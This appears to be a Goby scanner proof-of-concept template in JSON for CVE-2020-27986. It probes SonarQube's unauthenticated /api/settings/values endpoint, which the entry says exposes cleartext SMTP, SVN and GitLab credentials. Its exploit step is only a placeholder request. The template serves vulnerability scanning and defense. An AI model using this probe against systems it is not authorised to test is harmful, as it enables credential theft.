{ "Name": "SonarQube unauth CVE-2020-27986", "Level": "2", "Tags": [ "unauth" ], "GobyQuery": "app=\"SonarQube\"", "Description": "SonarQube empowers all developers to write cleaner and safer code.", "Product": "SonarQube", "Homepage": "https://www.sonarqube.org/", "Author": "", "Impact": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.", "Recommendation": "https://docs.sonarqube.org/latest/setup/get-started-2-minutes
https://blog.sonarsource.com/public-response-code-leaks", "References": [ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986" ], "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/api/settings/values", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "sonaranalyzer-cs.nuget.packageVersion", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "sonar.core.id", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }